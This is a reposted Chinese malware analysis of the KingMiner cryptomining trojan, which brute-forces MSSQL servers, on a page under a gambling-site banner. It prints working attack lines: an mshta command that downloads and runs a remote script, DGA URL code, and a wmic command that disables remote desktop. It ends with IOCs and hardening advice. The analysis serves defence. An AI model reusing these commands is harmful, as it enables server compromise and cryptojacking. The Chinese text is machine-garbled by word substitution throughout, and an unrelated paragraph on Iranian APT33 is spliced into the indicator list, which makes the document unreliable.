欢迎访问Sunbet官网(www.sunbet.us),Allbet欧博官网(www.ALLbetgame.us)!

首页Sunbet_安全防护正文

针对SQL弱口令的爆破进击再度袭来,KingMiner矿工已掌握上万电脑

b9e08c31ae1faa592019-11-29153Web安全

一、背景

腾讯平安御见要挟情报中心检测到KingMiner变种进击,KingMiner是一种针对Windows效劳器MSSQL举行爆破进击的门罗币挖矿木马。该木马最早于2018年6月中旬初次涌现,并在随后敏捷宣布了两个革新版本。进击者采用了多种回避手艺来绕过虚拟机环境和平安检测,致使一些反病毒引擎没法正确检测。

当前版本KingMiner具有以下特性:

1. 针对MSSQL举行爆破进击入侵;

2. 应用WMI定时器和Windows计划使命举行耐久化进击;

3. 封闭存在CVE-2019-0708破绽机械上RDP效劳防备其他挖矿团伙入侵,以独有已掌握的效劳器资本;

4. 运用base64和特定编码的XML,TXT,PNG文件来加密木马顺序;

5. 应用微软和多个着名厂商的签名文件作为父历程,“白+黑”启动木马DLL。

依据腾讯平安御见要挟情报中心统计数据,KingMiner影响凌驾一万台电脑,个中受影响最严峻的区域为广东、重庆、北京、上海等地。

二、详细分析

KingMiner在MSSQL爆破入侵胜利后,起首实行一段VBS剧本(tl.txt/vk.txt),检测操作体系版本,并依据差别的体系版本下载差别的Payload文件,应用下载的文件举行提权以及门罗币挖矿。同时还会装置WMI定时器和Windows计划使命来重复实行指定剧本,实行效劳器返回的歹意代码到达耐久化进击的目标。

 

提权

vk.txt从http[:]// w.30713fdae.tk/32tl.zip下载经由base64编码的二进制blob文件,经由解码后保留为C:\Users\Public\Downloads\<random>\tool.exe

针对SQL弱口令的爆破进击再度袭来,KingMiner矿工已掌握上万电脑  Web安全 第1张

tool.exe 应用Windows权限提拔破绽CVE-2019-0803举行进击,胜利应用此破绽的进击者能够在内核形式下运转恣意代码,然后能够装置顺序;检察、变动或删除数据;或建立具有完整用户权限的新帐户。

tool.exe在特权形式下实行敕令mshta.exe vbscript:GetObject(\"script:http[:]//aa.30583fdae.tk/r1.txt\")(window.close),经由历程mshta.exe实行剧本r1.txt来举行耐久化。

耐久化

计时器

r1.txt设置名为WindowsSystemUpdate _WMITimer的计时器,并将实行一段剧本代码的事宜消费者WindowsSystemUpdate _consumer经由历程事宜过滤器WindowsSystemUpdate _filter绑定到计时器,从而经由历程计时器每15分钟实行一次下面的VBS剧本代码:

这段VBS代码依据差别状况采用两种要领生成URL,接着经由历程接见生成的URL下载第二阶段的Payload运转。

1.URL由IP地点转化为ASCII后拼接而成

剧本运转nslookup敕令查询C&C域名news.g23thr.com的DNS纪录,当news.g23thr.com剖析的IP地点为xxx.xxx.xxx.120,则接见URL

“http://”+chr(xxx)+chr(xxx)+chr(xxx)+”xfghh.com/mgxbox.txt”

2.URL由与时候相干的DGA域名拼接而成

当查询DNS返回IP不符合指定花样,则DGA域名经由历程当前时候的年、月、日、分钟、秒数值盘算获得,算法以下:

u =(hex((year(now())-2000)&Month(now())&(day(now())\7)&(year(now())-2000)))&"fdae.tk"
url = "http://"&minute(now())&second(now())&"."&u&"/mgxbox.txt"
计划使命

r1.txt经由历程RegisterTaskDefinition建立名为WindowsMonitor的计划使命,每15分钟实行一次以下剧本;或许装置触发前提为体系启动的计划使命WindowsHelper,并在WindowsHelper触发后再次装置WindowsMonitor定时使命实行统一段剧本:

计划使命终究实行的剧本以下:

针对SQL弱口令的爆破进击再度袭来,KingMiner矿工已掌握上万电脑  Web安全 第2张

计划使命实行的VBS剧本与WMITimer实行的剧本相似,经由历程DNS查询返回的数据,或许猎取时候转换后生成的DGA域名拼接URL,实行接见URL后返回的代码。

url=“http://”+chr(xxx)+chr(xxx)+chr(xxx)+”xfghh.com/pow.txt”

或许

u =(hex((year(now())-2000)&Month(now())&(day(now())\7)&(year(now())-2000)))&"fdae.tk"
url = "http://"&minute(now())&second(now())&"."&u&"/pow.txt"

当前接见url返回的代码以下:

CreateObject("WScript.Shell").Run "cmd /c ver |findstr  ""5.0 5.1 5.2 6.0 6.1""&&wmic qfe GET hotfixid |findstr /i ""kb4499175 kb4500331 KB4499149 KB4499180 KB4499164""||wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 0",0,False

返回代码的功用为:

猎取盘算机版本并推断盘算机版本是不是受CVE-2019-0708破绽的影响且盘算机是不是装置特定补丁(kb4499175 kb4500331 KB4499149 KB4499180 KB4499164为微软宣布的CVE-2019-0708长途桌面效劳长途代码实行破绽的补丁号)。

假如没有装置补丁,则修正设置制止其他机械经由历程长途桌面效劳接见本机,经由历程这类体式格局来阻挠其他木马进入体系,从而到达独有挖矿资本的目标。

挖矿

vbs剧本tl.txt从http[:]// w.30713fdae.tk/32a1.zip下载经由base64编码的二进制blob文件。

文件解码并解压后保留至C:\Users\Public\Downloads\<random>\目录下,个中<random>为取当前时候“年月日时分秒”花样生成的字符。

alger.exe为微软体系文件credwiz.exed,功用形貌为Credential Backup and Restore Wizard(凭证备份和复原导游),该顺序在启动后自动加载体系DLL文件duer.dll并挪用其导出函数InitGadgets()。

针对SQL弱口令的爆破进击再度袭来,KingMiner矿工已掌握上万电脑  Web安全 第3张

除了微软体系文件外,KingMiner在挖矿木马的“白+黑”启动历程当中还应用了多个着名公司的含数字签名的文件来回避杀软检测,应用一般的有数字签名的白文件来挪用歹意dll,现在发明的包含以下数字签名:

“GuangZhou KuGou Computer Technology Co.,Ltd.”

“Google Inc”

“福建创意嘉和软件有限公司”

针对SQL弱口令的爆破进击再度袭来,KingMiner矿工已掌握上万电脑  Web安全 第4张

针对SQL弱口令的爆破进击再度袭来,KingMiner矿工已掌握上万电脑  Web安全 第5张

32a1.zip/64a1.zip解压后在统一目录下开释受信托的体系文件alger.exe(credwiz.exed)和歹意的duer.dll,应用alger.exe加载duer.dll并挪用其导出的InitGadgets(),从而在InitGadgets()中解密保留在同目录下的x.txt或x/y/z.png中的XMRig挖矿顺序代码,并启动门罗币挖矿历程。

三、平安发起

我们发起企业针对KingMiner挖矿木马的手艺特性采用针对性的防备步伐:

1.依据微软官方通告修复特权提拔破绽CVE-2019-0803:

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0803

2、加固SQL Server效劳器,修补效劳器平安破绽。运用平安的暗码战略,运用高强度暗码,切勿继承运用弱口令,特别是sa账号暗码,防备黑客暴力破解。

3、修正SQL Sever效劳默许端口,在原始设置基础上变动默许1433端口设置,而且设置接见划定规矩,谢绝1433端口探测。

IOCs @KingMiner

IP

107.154.161.209

107.154.158.39

Domain

工控体系再迎大波涛,伊朗APT构造将其作为重点进击目的 【导读】前段时间,在弗吉尼亚州阿灵顿举行的CyberwarCon会议上,有安全研究专家指出,伊朗黑客组织APT33活动及攻击目标发生变化,将攻击重点从IT网络转移到包括电力、制造和炼油厂等在内的工业控制系统。虽然还没有直接证据,但综合考虑到APT33的历史以及美伊之间持续发生的网络战争,APT33攻击目标向关键基础设施转移不得不引起我们持续性关注。 伊朗APT组织活动发生变化,工业控制系统成其重点攻击目标  前段时间,在弗吉尼亚州阿灵顿举行的CyberwarCon会议上,安全研究员内德·莫兰(Ned Moran)表示:伊朗黑客组织APT33(也称为Elfin,RefinedKitten和Holmium)的活动发生了变化: 据持续性观察,APT33一直在进行所

q.112adfdae.tk

q.30583fdae.tk

aa.30583fdae.tk

w.30713fdae.tk

a.1b051fdae.tk

news.g23thr.com

a.qwerr.ga

w.ddff1.tk

Md5

duser.dll

20e502ff977b336d9e7785186b16c68a

78b56b92c2e7a42520fb99a84d78cf92

active_desktop_render_x64.dll

21048ff02894656b5b24d4ed3c8a2882

goopdate.dll

7def058c5d2acb660f394d04b4698580

soundbox.dll

88a5c4645c2a9d0481fd0a846e49b773

64tl.zip

be45959bc043a4fe88351cd03289f240

64a1.zip

4d910cb71c2f55bde48521f7ae062da4

32a1.zip

465373b74d163028add70f0d2b0966d0

23ef4da80f6985a78c4a59467ac4612f

32tl.zip

e09947875b4722aab067c4d0c4b30384

r1.txt

21cb01553d92bee4fefc0069db1fd5ea

c568d6028735cdc2a1ddd3c01f14ca80

tl.txt

b0ab674b842822358be8cd5f6dc91554

vk.txt

e3accf5a6f58932e56192bfbcbf0804c

c874dbb6bf3664990b57d07d7d220ee6

n.txt

2b702a22963448c164db26807a308d50

pow.txt/mgxbox.txt

03d24675d4de12bcd076e7eff213a8a4

htak.txt

5fd47b2be01004e41290bf7658c7ad5a

tool.exe

4899762134c0d2d8fbbaecc289a0c74e

URL

http[:]//4056.309cffdae.tk/vk.txt

http[:]//3023.309cffdae.tk/vk.txt

http[:]//5311.1d28ebfdae.com/pow.txt

http[:]//3843.1d28ebfdae.com/pow.txt

http[:]//5921.1d28ebfdae.com/mgxbox.txt

http[:]//ww33.3096bfdae.com/32a1.cab

http[:]//ww33.3096bfdae.com/64a1.cab

http[:]//a.qwerr.ga/32a.zip

http[:]//a.qwerr.ga/64f.zip

http[:]//aa.30583fdae.tk/r1.txt

http[:]//aa.30583fdae.tk/tl.txt

http[:]//aa.30583fdae.tk/r1.txt

http[:]//q.30583fdae.tk/32tl.zip

http[:]//q.30583fdae.tk/64tl.zip

http[:]//q.30583fdae.tk/64a1.zip

http[:]//q.30583fdae.tk/32a1.zip

http[:]//w.30713fdae.tk/vyk.txt

http[:]//w.30713fdae.tk/64a1.zip

http[:]//w.30713fdae.tk/32a1.zip

http[:]//w.ddff1.tk/32a1.zip

http[:]//w.ddff1.tk/64a1.zip

矿池:

95.179.131.54:9761

w.homewrt.com:9761

原文地点: https://www.4hou.com/web/21821.html

网友评论